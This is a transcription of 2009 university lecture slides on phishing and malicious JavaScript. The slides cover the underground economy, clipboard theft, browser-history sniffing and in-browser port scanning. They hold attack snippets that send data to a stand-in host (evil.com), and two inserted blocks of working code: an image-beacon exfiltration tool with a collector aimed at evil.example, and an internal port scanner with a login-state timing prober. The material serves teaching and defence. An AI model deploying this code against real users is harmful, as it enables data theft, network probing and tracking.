Phishing and Malicious Javascript: John Mitchell

This document outlines a lecture on phishing and malicious JavaScript. It discusses how phishing uses deception through web technology to steal identities for profit in an underground economy. It also examines how JavaScript can be used for mischief by accessing local state like the clipboard or browsing history, customizing page displays, probing networks through port scanning or timing attacks, and communicating data back to servers. The document provides examples of these techniques and discusses trends in web attacks.

CS 142 Winter 2009

Phishing and Malicious JavaScript

John Mitchell
Outline
Phishing and online identity theft
 Deception through web technology
 Underground economy – what thieves are after
Mischief and deception
 Accessing local state
 Reading the clipboard (now mitigated)
 Accessing browser history
 Customizing display based on state
 Chameleon pages (for good and evil)
 Context-aware phishing
 Probing the network
 Port scanning, with and without JavaScript
 Timing attacks on login pages
 Communicating back to the server
 Query parameters
 Persistent bidirectional communication
Trends
Most prevalent attacks (2006)
 Cross-site scripting (XSS) – 22%
  Bad web site uses bad page to attack good site
 SQL Injection – 14%
  Malicious form input to web server
 PHP Includes – 10%
 Buffer overflow – 8%

2005 was the first year that XSS jumped ahead of buffer overflows …

Updated trends (mid-2008)
http://www-935.ibm.com/services/us/iss/xforce/midyearreport/xforce-midyear-report-2008.pdf
Web security: two sides
Web browser: (client side)
 Attacks target browser security weaknesses
 Result in:
  Malware installation (keyloggers, bot-nets)
  Document theft from corporate network
  Loss of private data
Web application code: (server side)
 Runs at web site: banks, e-merchants, blogs
 Written in PHP, ASP, JSP, Ruby, …
 Many potential bugs: XSS, XSRF, SQL injection
Online Identity Theft
Password phishing
 Forged email and fake web sites steal passwords
Password theft
 Criminals break into servers and steal password files
Spyware
 Keyloggers steal passwords, product activation
codes, etc.
Botnets
 Networks of compromised end-user machines spread
SPAM, launch attacks, collect and share stolen
information
Magnitude
 $$$ billions in direct loss per year
 Significant indirect loss
 Loss of confidence in online transactions
Phishing Attack
 Bad guy sends email: "There is a problem with your eBuy account"
 User clicks on email link to www.ebuj.com.
 User thinks it is ebuy.com, enters eBuy username and password.
 Password sent to bad guy
(Diagram: email from the bad guy, user's click on the www.ebuj.com link, "Password?" prompt on the fake site, password flowing back to the bad guy.)
100,000 victims of MySpace Attack
Spear-Phishing
Targeted email to customers of specific bank
 Higher success rate
 Lower detection rate - beat current filtering techniques
How to get email accounts for site customers?
 Most sites have "Forgot my password" pages
 Leaks whether an email is valid or not at that site
We'll return to this later!
Underground commerce
(Diagram: spam service, rent-a-bot, cash-out, pump and dump, botnet rental)
Market in access to bots
 Botherd: Collects and manages bots
 Access to proxies ("peas") sold to spammers, often with commercial-looking web interface
Sample botnet rates
 Non-exclusive access: 10¢ per machine. Exclusive access: 25¢.
 Payment via compromised account (eg PayPal) or cash to dropbox
Identity Theft
 Keystroke logging
 Complete identities available for $25 - $200+
 Rates depend on financial situation of compromised person
 Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner
(Slide images: Ruslan Ibragimov / send-safe.com; Ruslan Ibragimov – ROKSO Record)
Seen a message like this recently?
(Slide image: sample spam message)
Pump-and-dump using phished or keylogged brokerage accounts
October 2006
 E-Trade lost $18M in 3 months
 TD Ameritrade lost $4M
December 2006
 Evgeny Gashichev, Estonia
 SEC froze assets of his co., Grand Logistic, on Dec 19, 2006
 Used 25 stolen accounts to manipulate US financial markets
 Made $353,609 in 6 weeks
January 2007
 Aleksey Kamardin, 21, Florida
 Used stolen accounts to pump up value of 17 penny stocks
 Etrade, Scottrade, TD Ameritrade, JPMorgan Chase, C.
Slide: David Jevans
Outline
Phishing and online identity theft
 Deception through web technology
 Underground economy – what thieves are after
Mischief and deception
 Accessing local state
 Reading the clipboard (now mitigated)
 Accessing browser history
 Customizing display based on state
 Chameleon pages (for good and evil)
 Context-aware phishing
 Probing the network
 Port scanning, with and without JavaScript
 Timing attacks on login pages
 Communicating back to the server
 Query parameters
 Persistent bidirectional communication
HTML Image Tags
<html>
<p> … </p>
<img src="http://example.com/sunset.gif" height="50" width="100">
</html>

Displays this nice picture. Security issues?

Image tag security issues
Communicate with other sites
– <img src="http://evil.com/pass-local-information.jpg?extra_information">
– The browser issues this GET with no user interaction, so anything the page's script can read can be placed in the query string
Hide resulting image
– <img src=" … " height="1" width="1">
Spoof other sites
– Add logos that fool a user

Very Important Point: A web page can send information to any site
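The query-string channel above, worked through end to end as an added example (not code from the lecture): the page-side builder that splits a payload into hidden image requests, and the collector that the receiving server would run. The host evil.example and the path pixel.gif are hypothetical, and the payload in the demo is constructed.

```javascript
// Added example, not from the lecture: exfiltrating data a page can read
// over plain <img> GET requests, plus the collector that reassembles it.
// evil.example and pixel.gif are hypothetical; the payload is constructed.

// Browsers and servers cap URL length (a few KB is a safe working
// assumption), so the payload is split before encoding. Each chunk is
// tagged with a session id, its index and the chunk count so the
// collector can reassemble requests that arrive out of order.
function buildBeaconUrls(base, data, sessionId, maxChunk = 512) {
  const chunks = [];
  for (let i = 0; i < data.length; i += maxChunk) {
    chunks.push(data.slice(i, i + maxChunk));
  }
  if (chunks.length === 0) chunks.push("");
  return chunks.map((chunk, i) =>
    base +
    "?s=" + encodeURIComponent(sessionId) +
    "&i=" + i +
    "&n=" + chunks.length +
    "&d=" + encodeURIComponent(chunk));
}

// Browser side: one Image per URL. The GET is issued even though the image
// is never inserted into the document, and the 1x1 size hides it if it is.
// Returns the number of requests started (0 when there is no DOM).
function sendBeacons(urls) {
  if (typeof Image === "undefined") return 0;
  for (const url of urls) {
    const img = new Image(1, 1);
    img.src = url;
  }
  return urls.length;
}

// Collector side: what the server behind pixel.gif does with each request,
// modelled on the request URL alone. Returns the full payload once every
// chunk of a session has arrived, otherwise null.
function collect(store, requestUrl) {
  const q = new URL(requestUrl).searchParams;      // decodes %XX for us
  const session = q.get("s");
  const index = Number(q.get("i"));
  const count = Number(q.get("n"));
  if (!Number.isInteger(index) || !Number.isInteger(count) ||
      index < 0 || index >= count) {
    return null;                                   // malformed beacon
  }
  let entry = store.get(session);
  if (!entry || entry.parts.length !== count) {
    entry = { parts: Array.from({ length: count }, () => undefined) };
    store.set(session, entry);
  }
  entry.parts[index] = q.get("d");
  if (entry.parts.some((p) => p === undefined)) return null;
  return entry.parts.join("");
}

// Demo with a constructed payload (page title plus a pretend form value).
if (typeof require !== "undefined" && require.main === module) {
  const payload = JSON.stringify({ title: "My Bank - Login", user: "alice" });
  const urls = buildBeaconUrls("http://evil.example/pixel.gif", payload, "sess1", 64);
  const store = new Map();
  let result = null;
  for (const u of urls) result = collect(store, u);
  console.log(urls.length, "requests; reassembled:", result);
}
```

The defensive counterpart is on the site being attacked, not the collector: a Content-Security-Policy with a restrictive img-src (and connect-src) stops an injected script from loading images from arbitrary hosts, which is exactly the channel this example uses.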
Accessing local state
Read clipboard contents
<html>
<p> Test script to read clipboard contents. </p>
<script>
// window.clipboardData is an Internet Explorer-only object; other browsers
// never exposed the clipboard this way, and IE 7 and later prompt the user first.
var content = window.clipboardData.getData("Text");
alert("Clipboard contents = " + content)
</script>
</html>

This probably does not work in your current browser – try it!
Stealing clipboard contents
Create hidden form, enter clipboard text, post form
<form name="hf" method="POST" action="http://www.site.com/targetpage.php" style="display:none">
<input type="text" name="topicID">
<input type="submit">
</form>
<script type="text/javascript">
// Same IE-only clipboard read as above, but the value leaves the machine
// via a form post to the attacker's server instead of an alert.
var content = window.clipboardData.getData("Text");
document.forms["hf"].elements["topicID"].value = content;
document.forms["hf"].submit();
</script>
User browsing history?
Which parts of the CS258 web site did I visit recently?

Reading user history
JavaScript can read style properties
var node = document.createElement("a");
node.href = url;
document.body.appendChild(node);   // a detached element has no computed style
var color = getComputedStyle(node, null).getPropertyValue("color");
// compare against the color the page's own stylesheet assigns to a:visited
if (color == "rgb(0, 0, 255)") { … }

CSS :visited style property
<style>
a:visited { background: url(track.php?bank.com); }
</style>
<a href="http://bank.com/">Hi</a>
(The request for track.php is only made if the user has visited bank.com, so the server learns it without any script running.)

Browsers have since mitigated both tricks: getComputedStyle reports the unvisited style, and :visited rules may only change colors, never trigger a load.

Can be used for good or evil
Report user risks back to bank
 Bank can test whether customer has visited any known phishing site, warn her
Context aware phishing
 Email recipient sees logo, msg of own bank
Port scanning behind firewall
JavaScript can:
 Request images from internal IP addresses
 Example: <img src="http://192.168.0.4:8080/"/>
 Use timeout/onError to determine success/failure
 Fingerprint webapps using known image names
(Diagram: 1) the browser asks the malicious server "show me dancing pigs!"; 2) the server replies "check this out" with a page that scans hosts behind the user's firewall; 3) the page reports the port scan results back to the server.)
Rendering and events
Basic execution model
 Each browser window or frame
  Loads content
  Renders
   Processes HTML and scripts to display page
   May involve images, subframes, etc.
  Responds to events
Events can be
 User actions: OnClick, OnMouseover
 Rendering: OnLoad, OnBeforeUnload
 Timing: setTimeout(), clearTimeout()
JavaScript onError
Basic function
 Triggered when error occurs loading a document or an image
Example
<img src="image.gif" onerror="alert('The image could not be loaded.')">
 Runs onError handler if image does not exist and cannot load

http://www.w3schools.com/jsref/jsref_onError.asp
JavaScript timing
Sample code
<html><body><img id="test" style="display: none">
<script>
var test = document.getElementById('test');
var start = new Date();
test.onerror = function() {
  var end = new Date();
  alert("Total time: " + (end - start));
}
test.src = "http://www.example.com/page.html";
</script>
</body></html>

 When the response header indicates that the page is not an image, the browser stops and notifies JavaScript via the onerror handler. The elapsed time therefore measures how long www.example.com took to answer, even though the script can never read the response itself.
Spear-Phishing (revisited)
Targeted email to customers of specific bank
 Higher success rate
 Lower detection rate - beat current filtering techniques
How to get email accounts for site customers?
 Most sites have "Forgot my password" pages
 Leaks whether an email is valid or not at that site
Direct Timing
Time a login attempt
 The response time of the server depends on whether the email address used is valid or not, typically because the handler looks the account up first and only does the expensive password check for an account that exists
This problem affects every tested web site!
Cross-Site Timing Attack
Hijack a user's browser session to time sites
 The attacker's page makes the victim's browser request the target site, so the requests carry the victim's cookies
 Timing depends on the user's relationship with the target site
 Can distinguish logged in from not
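An added example, not from the lecture, that serves both the port-scanning slide and the cross-site timing slide: one helper that times an image load and resolves with load, error or timeout, a heuristic that turns a measurement into a port state, and a login-state probe that takes the median of several cache-busted samples. The hosts, ports, URLs and threshold values are assumptions; timeImageLoad needs a browser, while the classification helpers are pure and run anywhere.

```javascript
// Added example, not from the lecture: one <img>-timing helper serving
// both measurements the slides describe: scanning ports on an internal
// host and telling whether the victim is logged in to a site.
// Hosts, ports, URLs and thresholds are assumptions.

// Load one URL as an image and resolve with the outcome (load / error /
// timeout) and elapsed milliseconds. Cross-origin content is never
// readable, but when it arrives is.
function timeImageLoad(url, timeoutMs) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    let done = false;
    let timer = null;
    const finish = (outcome) => {
      if (done) return;
      done = true;
      clearTimeout(timer);
      img.onload = img.onerror = null;
      img.src = "";                          // abandon a still-pending request
      resolve({ url, outcome, elapsed: performance.now() - start });
    };
    timer = setTimeout(() => finish("timeout"), timeoutMs);
    img.onload = () => finish("load");
    img.onerror = () => finish("error");
    img.src = url;
  });
}

// Port-scan interpretation of one measurement. Heuristic: a closed port
// answers with a TCP reset almost immediately; a listening service has to
// accept the connection and send a (non-image) response first, which takes
// longer; a dropped packet (firewall, or no host at that address) runs into
// the timeout. rstMs is the assumed cut-off between the first two.
function classifyPort(result, { rstMs = 50 } = {}) {
  if (result.outcome === "load") return "open (served an image)";
  if (result.outcome === "timeout") return "filtered or no host";
  return result.elapsed < rstMs ? "closed (reset)" : "open (non-image response)";
}

// Sequential scan of one internal host, e.g. scanHost("192.168.0.4", [80, 8080]).
async function scanHost(host, ports, timeoutMs = 2000) {
  const results = {};
  for (const port of ports) {
    const r = await timeImageLoad("http://" + host + ":" + port + "/", timeoutMs);
    results[port] = classifyPort(r);
  }
  return results;
}

// Cross-site timing. The victim's browser attaches its cookies for the
// target, so a page that is cheap to serve when logged out and expensive
// when logged in (an account page that hits a database, say) takes a
// measurably different time. A median over several samples tames jitter;
// a cache-busting parameter keeps the browser from answering from cache.
function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const m = s.length >> 1;
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

// calib: elapsed ms measured beforehand from a known logged-out and a known
// logged-in browser (assumed values).
function classifyLoginState(elapsedMs, calib) {
  const cutoff = (calib.loggedOutMs + calib.loggedInMs) / 2;
  return elapsedMs >= cutoff ? "logged in" : "logged out";
}

async function probeLoginState(url, calib, samples = 5, timeoutMs = 5000) {
  const times = [];
  for (let i = 0; i < samples; i++) {
    const sep = url.includes("?") ? "&" : "?";
    const r = await timeImageLoad(url + sep + "nocache=" + Date.now() + i, timeoutMs);
    times.push(r.elapsed);
  }
  return classifyLoginState(median(times), calib);
}
```

Two caveats when trying this in a current browser: browsers refuse to connect to a list of "unsafe" ports (22, 25, 6667 and others) from page content, so those ports always report an error regardless of state, and the reset-versus-response cut-off has to be calibrated on the network in question rather than taken from the constant above.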
Remote scripting
Goal
 Exchange data between a client-side app running in a browser and server-side app, w/o reloading page
Methods
 Java Applet/ActiveX control/Flash
  Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
 XML-RPC
  Open, standards-based technology that requires XML-RPC libraries on server and in your client-side code
 Simple HTTP via a hidden IFRAME
  IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options

See: http://developer.apple.com/internet/webcontent/iframe.html
Frame and iFrame
Window may contain frames from different sources
 Frame: rigid division as part of frameset
 iFrame: floating inline frame
iFrame example
<IFRAME SRC="hello.html" WIDTH=450 HEIGHT=100>
If you can see this, your browser doesn't understand IFRAME.
</IFRAME>

Why use frames?
 Delegate screen area to content from another source
 Browser provides isolation based on frames
 Parent may work even if frame is broken
Simple remote scripting example
client.html: RPC by passing arguments to server.html in query string
<script type="text/javascript">
function handleResponse(result) {
  alert('this function is called from server.html with: ' + result);
}
</script>
<iframe id="RSIFrame" name="RSIFrame"
  style="width:0px; height:0px; border: 0px"
  src="blank.html">
</iframe>
<a href="server.html?arg=42" target="RSIFrame">make RPC call</a>

server.html: another page on same server, could be server.php, etc
<script type="text/javascript">
// Argument arrives in the query string; result goes back via the parent
// window, which is only scriptable because both pages share an origin.
var arg = location.search.substring(1).split('=')[1];
window.parent.handleResponse('received ' + arg);
</script>

RPC can be done silently in JavaScript, passing and receiving arguments: setting the hidden iframe's src from script makes the call without the user clicking a link.


Conclusion
Phishing and online identity theft
 Deception through web technology
 Underground economy – what thieves are after
Mischief and deception
 Accessing local state
 Reading the clipboard (now mitigated)
 Accessing browser history
 Customizing display based on state
 Chameleon pages (for good and evil)
 Context-aware phishing
 Probing the network
 Port scanning, with and without JavaScript
 Timing attacks on login pages
 Communicating back to the server
 Query parameters
 Persistent bidirectional communication
Reading
Phishing and online identity theft
 Required: pages 8-12 on types of phishing attacks
 Recommended: skim pages 13-44 on defenses
Port scanning
 Read the short web page
History tracking
 Required: sections 1, 2.2, 4 (link tracking)
 Recommended: rest of section 2, section 3 (cache
tracking)
 Optional: rest of paper
Timing attacks
 Required: sections 1, 3, 5
 Recommended: section 4 (cross-site timing)
 Optional: rest of paper
